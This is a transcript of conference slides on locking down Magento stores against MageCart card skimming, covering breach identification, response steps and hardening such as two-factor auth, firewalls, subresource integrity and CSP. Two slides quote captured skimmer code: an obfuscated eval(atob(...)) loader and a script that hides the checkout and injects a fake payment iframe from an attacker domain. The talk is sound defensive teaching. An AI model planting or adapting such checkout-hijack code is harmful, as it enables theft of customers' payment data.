Locking down your Magento store

Transcript

1. Locking down your Magento Shop Tom Robertshaw @bobbyshaw

2. And 10,000s more. MageCart

3. • 20 lines of JS • Duplicates form submissions to

   dead-drop. • Invisible to merchant and customer. MageCart

4. Dude, where’s my checkout?

5. “The checkout’s broken” “Wait a minute, that’s not our checkout.”

   Identify

6. eval(atob("ZnVuY3Rpb24gc2V0QzAxKG5hbWUsdmFsdWUsZGF5...”)); Identify

7. if (document.title == "One Step Checkout | Merchant Name") {

   var __gt2 = "https://api-secure-checkout.com" ; var __b0 = document.body; __b0.insertAdjacentHTML('beforebegin', '<iframe src=' + __gt2 + '/checkout_merchantname.php?id=" id="XBA323" width="100%" height="1000px" frameBorder="0"></iframe>'); __b0.style.display = "none"; } Identify

8. • Admin User ◦ Name, Email, Changed and Updated At

   • Misc Scripts Config ◦ The breach Preserve

9. • Delete Admin User • Remove script from Misc Scripts

   Config • Review and Redeploy all files Remove Hack

10. ‍♀ • When? • What? • How? Investigate

11. • Admin actions log • Web server access log 216.151.184.62

    - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034 216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907 216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 Investigate

12. • Code Vulnerability ◦ Core, third-party plugins, bespoke plugins •

    Admin access ◦ Brute force, Infected staff computers • External software ◦ Phpmyadmin (adminer), magmi Investigate

13. • Rotate passwords • Remove Downloader • Implement next level

    of security ◦ E.g. IP restricted admin Close Up Breach

14. ✉ Report nefarious domain and IP to registrar and host.

    Close Up Breach

15. • Customers • ICO • Payment providers • Insurers Report

16. Monitor for new breaches. Monitor

17. Security Monitoring https://sansec.io/

18. 1. Identify 2. Preserve 3. Remove Hack 4. Investigate 5.

    Close up breach 6. Report 7. Monitor Breach Response Summary

19. “I use an iframe payment gateway, I’m safe” No one

    is safe

20. What should you do? How much should you spend?

21. • Fines from Visa & Mastercard • Increased transaction costs

    • Increased business insurance costs • Fines from ICO • Loss of business as customers lose trust • Time & money spent investigating and resolving hack Business Impact

22. Marketing Team vs Security Team Flexibility vs control The Dichotomy

23. • Password management tool • Two-factor auth or IP whitelisting

    Admin Security

24. Web application firewall, e.g. Cloudflare Firewalls

25. • Keep core & modules up to date • Security

    audit each module Code

26. • Sign your JS where possible. <script integrity="sha256-ZGMHgi9G7WU+Z7WiP2suSn84yzoN83sGf9nMWJhVHAw=" src="//cdn.shopify.com/s/assets/storefront/express_buttons-646307822f 46ed653e67b5a23f6b2e4a7f38cb3a0df37b067fd9cc5898551c0c.js

    "></script> Subresource Integrity

27. Block/Monitor loaded assets Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://test-report.trackcsp.com/v1/494b06af-eb50-4c85-90 97-aa7c31e591b9 Content

    Security Policies

28. @gwillem Listen to Industry Experts @_talesh

29. Talesh Seeparsan’s Incident Response Template https://github.com/ talesh/response

30. Thanks @bobbyshaw